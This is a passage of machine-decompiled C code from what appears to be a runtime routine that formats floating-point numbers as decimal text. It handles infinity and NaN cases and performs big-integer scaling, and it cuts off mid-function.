				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				void* _t789;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void* _t1056;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				void* _t1080;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				signed int _t1151;
				signed int _t1152;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1161;
				signed int _t1162;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				unsigned int _t1168;
				void* _t1172;
				void* _t1173;
				unsigned int _t1174;
				signed int _t1179;
				signed int _t1180;
				signed int _t1182;
				signed int _t1183;
				intOrPtr* _t1185;
				signed int _t1186;
				void* _t1187;
				signed int _t1188;
				signed int _t1189;
				signed int _t1192;
				signed int _t1194;
				signed int _t1195;
				void* _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				void* _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int* _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				intOrPtr* _t1216;
				intOrPtr* _t1217;
				signed int _t1219;
				signed int _t1221;
				signed int _t1224;
				signed int _t1230;
				signed int _t1234;
				signed int _t1235;
				void* _t1236;
				signed int _t1240;
				signed int _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1261;
				signed int _t1262;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1271;
				signed int _t1273;
				signed int* _t1274;
				signed int* _t1277;
				signed int _t1286;

				_t1142 = __edx;
				_t1271 = _t1273;
				_t1274 = _t1273 - 0x964;
				_t743 =  *0xcfe7ac; // 0x349e4b74
				_v8 = _t743 ^ _t1271;
				_push(__ebx);
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1185 = _a16;
				_v1924 = _t1185;
				_v1920 = _t1055;
				E00CED416( &_v1944, __eflags);
				_t1234 = _a8;
				_t748 = 0x2d;
				if((_t1234 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1185 = _t748;
				 *((intOrPtr*)(_t1185 + 8)) = _t1055;
				_t1186 = _a4;
				if((_t1234 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00CE9994( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1186;
									_a8 = _t1234 & 0x7fffffff;
									_t1286 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1188 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1188 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1189 = _t1188 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1240 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1240;
									E00CEF460(_t1078, _t1286);
									_push(_t1078);
									 *_t1274 = _t1286;
									_t789 = E00CEF570();
									_t1080 = _t1078;
									_t790 = L00CF23A0(_t789, _t1058, _t1080, _t1143);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1189;
									_v464 = _t1189;
									_t1061 = (0 | _t1189 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1240;
									if(_t1240 < 0) {
										__eflags = _t1240 - 0xfffffc02;
										if(_t1240 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00CEBDE1( &_v468, 0x1cc,  &_v1396, 0);
												_t1274 =  &(_t1274[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1258 = _t1109;
														_t1216 =  &_v468 + _t1109 * 4;
														_v1880 = _t1216;
														while(1) {
															__eflags = _t1258 - _t1061;
															if(_t1258 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1216;
															}
															_t210 = _t1258 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1168 = 0;
																__eflags = 0;
															} else {
																_t1168 =  *(_t1216 - 4);
															}
															_t1216 = _t1216 - 4;
															_t972 = _v1880;
															_t1258 = _t1258 - 1;
															 *_t972 = _t1168 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1258 - 0xffffffff;
															if(_t1258 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1240 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1192 = 1 - _t1240;
											E00CDFFF0(_t1192,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1271 + 0xbad63d) = 1 << (_t1192 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1172 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1271 + _t1172 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0))) {
														goto L101;
													}
													_t1172 = _t1172 + 4;
													__eflags = _t1172 - 8;
													if(_t1172 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1173 = 0;
															__eflags = 0;
														} else {
															_t1173 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1259 = _t1110;
														__eflags = _t975 - _t1173 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1217 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1173 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1259 - _t1061;
															if(_t1259 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1217;
															}
															_t175 = _t1259 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1174 = 0;
																__eflags = 0;
															} else {
																_t1174 =  *(_t1217 - 4);
															}
															_t1217 = _t1217 - 4;
															_t981 = _v1880;
															_t1259 = _t1259 - 1;
															 *_t981 = _t1174 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1259 - 0xffffffff;
															if(_t1259 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1219 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1261 = _t1219 << 2;
														E00CDFFF0(_t1219,  &_v1396, 0, _t1261);
														 *(_t1271 + _t1261 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1219 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E00CEBDE1( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1277 =  &(_t1274[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1262 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1262;
										__eflags = _t1061 - _t1262;
										if(_t1061 != _t1262) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1221 = _t992 >> 5;
											_v1872 = _t1221;
											_v1908 = _t1114 - _t993;
											_t996 = E00CDF0C0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1179 = _t1061 + _t1221;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1179;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1179 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1179 - 0x00000073 > 0x00000000;
											__eflags = _t1179 - 0x73;
											if(_t1179 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00CEBDE1( &_v468, 0x1cc,  &_v1396, 0);
												_t1274 =  &(_t1274[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1179 - _t1119;
													if(_t1179 >= _t1119) {
														_t1179 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1179;
													_v1880 = _t1012;
													__eflags = _t1179 - 0xffffffff;
													if(_t1179 != 0xffffffff) {
														_t1180 = _v1872;
														_t1264 = _t1179 - _t1180;
														__eflags = _t1264;
														_t1123 =  &_v468 + _t1264 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1180;
															if(_t1012 < _t1180) {
																break;
															}
															__eflags = _t1264 - _t1061;
															if(_t1264 >= _t1061) {
																_t1224 = 0;
																__eflags = 0;
															} else {
																_t1224 =  *_t1123;
															}
															__eflags = _t1264 - 1 - _t1061;
															if(_t1264 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1271 + _t1020 * 4 - 0x1d0) = (_t1224 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1264 = _t1264 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1179 = _v1892;
														_t1221 = _v1872;
														_t1262 = 2;
													}
													__eflags = _t1221;
													if(_t1221 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1221 << 2);
														_t1274 =  &(_t1274[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1179;
													} else {
														_v472 = _t1179 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1262;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1271 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1271 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1266 = _t1023 >> 5;
													_v1876 = _t1266;
													_v1908 = _t1129;
													_t1027 = E00CDF0C0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1182 = _t1266 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1182;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1182 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1182 - 0x00000073 > 0x00000000;
													__eflags = _t1182 - 0x73;
													if(_t1182 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00CEBDE1( &_v468, 0x1cc,  &_v1396, 0);
														_t1274 =  &(_t1274[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1182 - _t1134;
															if(_t1182 >= _t1134) {
																_t1182 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1182;
															_v1892 = _t1135;
															__eflags = _t1182 - 0xffffffff;
															if(_t1182 != 0xffffffff) {
																_t1183 = _v1876;
																_t1268 = _t1182 - _t1183;
																__eflags = _t1268;
																_t1043 =  &_v468 + _t1268 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1183;
																	if(_t1135 < _t1183) {
																		break;
																	}
																	__eflags = _t1268 - _t1061;
																	if(_t1268 >= _t1061) {
																		_t1230 = 0;
																		__eflags = 0;
																	} else {
																		_t1230 =  *_t1043;
																	}
																	__eflags = _t1268 - 1 - _t1061;
																	if(_t1268 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1271 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1230 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1268 = _t1268 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1182 = _v1880;
																_t1266 = _v1876;
															}
															__eflags = _t1266;
															if(_t1266 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1266 << 2);
																_t1274 =  &(_t1274[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1182;
															} else {
																_v472 = _t1182 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E00CEBDE1();
										_t1277 =  &(_t1274[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0xcf83dc + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1199 = 0;
															_t1248 = 0;
															__eflags = 0;
															do {
																_t1153 = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) >> 0x20;
																 *(_t1271 + _t1248 * 4 - 0x1d0) = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) + _t1199;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1248 = _t1248 + 1;
																_t1199 = _t1153;
																__eflags = _t1248 - _t1096;
															} while (_t1248 != _t1096);
															__eflags = _t1199;
															if(_t1199 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1271 + _t856 * 4 - 0x1d0) = _t1199;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0xcf8346 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0xcf8346 + _t812 * 4) & 0x000000ff) + ( *(0xcf8347 + _t812 * 4) & 0x000000ff);
												E00CDFFF0(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E00CE0320( &(( &_v1396)[_t1097]), 0xcf7a40 + ( *(0xcf8344 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xcf8347 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1277 =  &(_t1277[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1202 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1154 =  &_v468;
														} else {
															_t1202 =  &_v468;
															_t1154 =  &_v1396;
														}
														_v1908 = _t1154;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1155 = 0;
														_t1250 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1155;
															_t870 = _t1155 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1203 = _t1202 -  &_v1860;
															__eflags = _t1203;
															_v1928 = _t1203;
															do {
																_t878 =  *(_t1271 + _t1203 + _t1250 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1204 = 0;
																	_t1099 = _t1250;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1203 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1155;
																			if(_t1099 == _t1155) {
																				 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1250;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1204;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1204 = _t886 * _v1896 >> 0x20;
																			_t1155 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1204;
																				if(_t1204 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1155;
																					if(_t1099 == _t1155) {
																						_t558 = _t1271 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1204;
																					_t1204 = 0;
																					 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t884;
																					_t1155 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1250 - _t1155;
																	if(_t1250 == _t1155) {
																		 *(_t1271 + _t1250 * 4 - 0x740) =  *(_t1271 + _t1250 * 4 - 0x740) & _t878;
																		_t526 = _t1250 + 1; // 0x1
																		_t1155 = _t526;
																		_v1864 = _t1155;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1250 = _t1250 + 1;
																__eflags = _t1250 - _t1098;
															} while (_t1250 != _t1098);
															goto L243;
														}
													} else {
														_t1205 = _v468;
														_v472 = _t1098;
														E00CEBDE1( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1277 =  &(_t1277[4]);
														__eflags = _t1205;
														if(_t1205 == 0) {
															goto L203;
														} else {
															__eflags = _t1205 - 1;
															if(_t1205 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1251 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1205;
																		_t1156 = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) >> 0x20;
																		 *(_t1271 + _t1251 * 4 - 0x1d0) = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1251 = _t1251 + 1;
																		_t1100 = _t1156;
																		__eflags = _t1251 - _v1896;
																	} while (_t1251 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1206 = _v1396;
													__eflags = _t1206;
													if(_t1206 != 0) {
														__eflags = _t1206 - 1;
														if(_t1206 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1252 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1206;
																	_t1157 = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) >> 0x20;
																	 *(_t1271 + _t1252 * 4 - 0x1d0) = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1252 = _t1252 + 1;
																	_t1101 = _t1157;
																	__eflags = _t1252 - _v1896;
																} while (_t1252 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00CEBDE1( &_v468, _t1064,  &_v2404, 0);
																		_t1277 =  &(_t1277[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1271 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E00CEBDE1();
														_t1277 =  &(_t1277[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
